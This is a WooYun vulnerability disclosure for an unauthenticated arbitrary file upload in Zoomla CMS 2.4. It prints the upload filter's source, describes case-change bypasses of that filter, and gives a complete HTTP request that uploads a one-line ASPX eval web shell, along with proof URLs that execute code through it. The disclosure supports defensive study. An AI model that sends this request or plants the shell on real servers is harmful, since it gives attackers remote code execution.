当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(34) 关注此漏洞

缺陷编号: WooYun-2015-125982

漏洞标题: 逐浪cms 2.4某处任意文件上传(不需要登录)

相关厂商: 逐浪CMS

漏洞作者: 1c3z

提交时间: 2015-07-10 20:47

公开时间: 2015-10-13 09:54

漏洞类型: 文件上传导致任意代码执行

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 任意文件上传 .net代码审核 任意文件上传

6人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-10: 细节已通知厂商并且等待厂商处理中
2015-07-15: 厂商已经确认,细节仅向厂商公开
2015-07-18: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-09-08: 细节向核心白帽子及相关领域专家公开
2015-09-18: 细节向普通白帽子公开
2015-09-28: 细节向实习白帽子公开
2015-10-13: 细节向公众公开

简要描述:

有防御,但是可以绕过

详细说明:

/Plugins/swfFileUpload/UploadHandler.ashx



有一个全局过滤

选区_059.png



asp_code.dll

class ZoomlaSecurityCenter

code 区域
public static void CheckUpladFiles()


	{


		HttpRequest request = HttpContext.Current.Request;


		HttpResponse response = HttpContext.Current.Response;


		if (HttpContext.Current.Request.ContentType.IndexOf("multipart/form-data") > -1)


		{


			HttpFileCollection files = request.Files;


			for (int i = 0; i < files.Count; i++)


			{


				HttpPostedFile httpPostedFile = files[i];


				string fileName = httpPostedFile.FileName;


				if (httpPostedFile.ContentLength > 0)


				{


					if (fileName.IndexOf(".") > -1)


					{


						string[] array = fileName.Split(new char[]


						{


							'.'


						});


						for (int j = 1; j < array.Length; j++)


						{


							string ext = array[j].ToString().ToLower();


							if (!ZoomlaSecurityCenter.ExNameCheck(ext))


							{


								string findStr = System.IO.Path.GetExtension(fileName).ToLower().Replace(".", "");


								string text = SiteConfig.SiteOption.UploadFileExts.ToLower();


								if (!StringHelper.FoundCharInArr(text, findStr, "|"))


								{


									function.WriteErrMsg("上传的文件不是符合扩展名" + text + "的文件");


									response.End();


								}


							}


							else


							{


								function.WriteErrMsg("请勿上传可疑文件!");


								response.End();


							}


						}


					}


					else


					{


						function.WriteErrMsg("请勿上传可疑文件!");


						response.End();


					}


				}


			}


		}


	}









将multipart/form-data的大小写改下就可以绕过了



局部过滤

可以改文件后缀名大小写绕过



code 区域
POST /Plugins/swfFileUpload/UploadHandler.ashx HTTP/1.1


Host: **.**.**.**


Content-Length: 263


Cache-Control: max-age=0


Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8


Origin: null


User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/43.0.2357.81 Chrome/43.0.2357.81 Safari/537.36


Content-Type: Multipart/form-data; boundary=----WebKitFormBoundaryNyS0P5wwqaOrCYsh


Accept-Encoding: gzip, deflate


Accept-Language: zh-CN,zh;q=0.8


Cookie: ASP.NET_SessionId=gwezhhqzegfs5nhcpdeaso5s; bdshare_firstime=1436497685958; jiathis_rdc=%7B%22http%3A//**.**.**.**/down/2407.shtml%22%3A%220%7C1436497760852%22%7D; hasshown=1





------WebKitFormBoundaryNyS0P5wwqaOrCYsh


Content-Disposition: form-data; name="Filedata"; filename="name.Aspx"


Content-Type: application/x-aspx





<%@ Page Language="Jscript"%><%eval(Request.Item["zsd"],"unsafe");%>


------WebKitFormBoundaryNyS0P5wwqaOrCYsh--





漏洞证明:

http://**.**.**.**/uploadfiles/2015/7/10/201507101729516640188.Aspx?zsd=Response.Write(%22wooyun%22);



http://**.**.**.**/uploadfiles/2015/7/10/201507101729537310808.Aspx?zsd=Response.Write(%22wooyun%22);

修复方案:

!!

版权声明:转载请注明来源 1c3z@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-07-15 09:52

厂商回复:

感谢反馈!

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2015-07-10 20:54 | wefgod ( 核心白帽子 | Rank:1825 漏洞数:183 | 力不从心)
    0

    给力

    1# 回复此人
  2. 2015-07-10 22:40 | 从容 ( 普通白帽子 | Rank:359 漏洞数:94 | Enjoy Hacking Just Because It's Fun | ...)
    0

    @wefgod 经典的口头禅

    2# 回复此人
  3. 2015-07-11 02:15 | 乌云首席鉴黄师 ( 普通白帽子 | Rank:467 漏洞数:127 | icisaw.cn 超低价虚拟主机VPS 购买返现 支...)
    0

    坐等忽略

    3# 回复此人
  4. 2015-07-12 10:20 | wefgod ( 核心白帽子 | Rank:1825 漏洞数:183 | 力不从心)
    0

    @从容 很给力,多一个字

    4# 回复此人
  5. 2015-10-13 10:23 | 需求又改了 ( 实习白帽子 | Rank:40 漏洞数:5 | 先用小锤抠缝,然后大锤搞定)
    0

    这产品真好

    5# 回复此人
  6. 2016-03-01 12:16 | Chinalover ( 实习白帽子 | Rank:39 漏洞数:9 | 你看得到我打在屏幕上的字,却看不到我落在...)
    3

    妈个鸡 CTF被吊打的路过

    6# 回复此人
  7. 2016-03-02 16:52 | P0ker_L ( 路人 | Rank:8 漏洞数:2 | 趣果有间,孤独无解)
    1

    @Chinalover 哈哈哈哈哈被吊打的+1。这也可以。。。

    7# 回复此人
  8. 2016-03-02 20:35 | wonderkun ( 实习白帽子 | Rank:47 漏洞数:6 | 信息安全)
    1

    ctf 懵逼者+1 这他妈也行。 给洞主点赞啦

    8# 回复此人
  9. 2016-03-04 13:47 | 云袭2001 ( 普通白帽子 | Rank:168 漏洞数:33 | 不努力的菜鸟)
    1

    ctf 懵逼者+1 这他妈也行。 给洞主点赞啦

    9# 回复此人

登录后才能发表评论,请先 登录